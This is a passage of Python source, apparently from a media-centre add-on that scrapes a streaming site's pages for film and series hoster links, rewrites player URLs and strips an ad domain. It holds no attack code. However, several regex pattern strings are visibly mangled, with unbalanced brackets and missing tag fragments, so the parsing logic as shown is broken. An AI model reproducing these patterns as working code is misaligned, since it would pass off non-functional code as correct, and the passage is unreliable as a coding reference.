__checkForNextPage(sHtmlContent):\n sPattern = '\"\"]+?)\">'\n oParser = cParser()\n aResult = oParser.parse(sHtmlContent, sPattern)\n\n if (aResult[0] == True):\n return aResult[1][0]\n\n return False\n\ndef showHosters():\n oGui = cGui()\n oParser = cParser()\n oInputParameterHandler = cInputParameterHandler()\n sUrl = oInputParameterHandler.getValue('siteUrl')\n sMovieTitle = oInputParameterHandler.getValue('sMovieTitle')\n sThumb = oInputParameterHandler.getValue('sThumb')\n\n oRequestHandler = cRequestHandler(sUrl)\n sHtmlContent = oRequestHandler.request()\n sHtmlContent = sHtmlContent.replace('http://creative.rev2pub.com', '')\n\n sPattern = '\\'\"]+?)[\\'\"]'\n aResult = oParser.parse(sHtmlContent, sPattern)\n\n if (aResult[0] == True):\n for aEntry in aResult[1]:\n\n if '/player' in aEntry:\n sTitle = sMovieTitle + ' (Redirection)'\n sUrl1 = aEntry.replace('player.full-stream.co/player?id=', 'full-stream.co/player.php?id=')\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', sUrl1)\n oOutputParameterHandler.addParameter('sMovieTitle', sMovieTitle)\n oOutputParameterHandler.addParameter('sThumb', sThumb )\n oGui.addLink(SITE_IDENTIFIER, 'redirectHosters', sTitle, sThumb, '', oOutputParameterHandler)\n\n else:\n sHosterUrl = aEntry\n oHoster = cHosterGui().checkHoster(sHosterUrl)\n if (oHoster != False):\n oHoster.setDisplayName(sMovieTitle)\n oHoster.setFileName(sMovieTitle)\n cHosterGui().showHoster(oGui, oHoster, sHosterUrl, sThumb)\n\n oGui.setEndOfDirectory()\n\ndef seriesHosters():\n oGui = cGui()\n oParser = cParser()\n oInputParameterHandler = cInputParameterHandler()\n sUrl = oInputParameterHandler.getValue('siteUrl')\n sMovieTitle = oInputParameterHandler.getValue('sMovieTitle')\n sThumb = oInputParameterHandler.getValue('sThumb')\n\n oRequestHandler = cRequestHandler(sUrl)\n sHtmlContent = oRequestHandler.request()\n\n sPattern = '
    .+?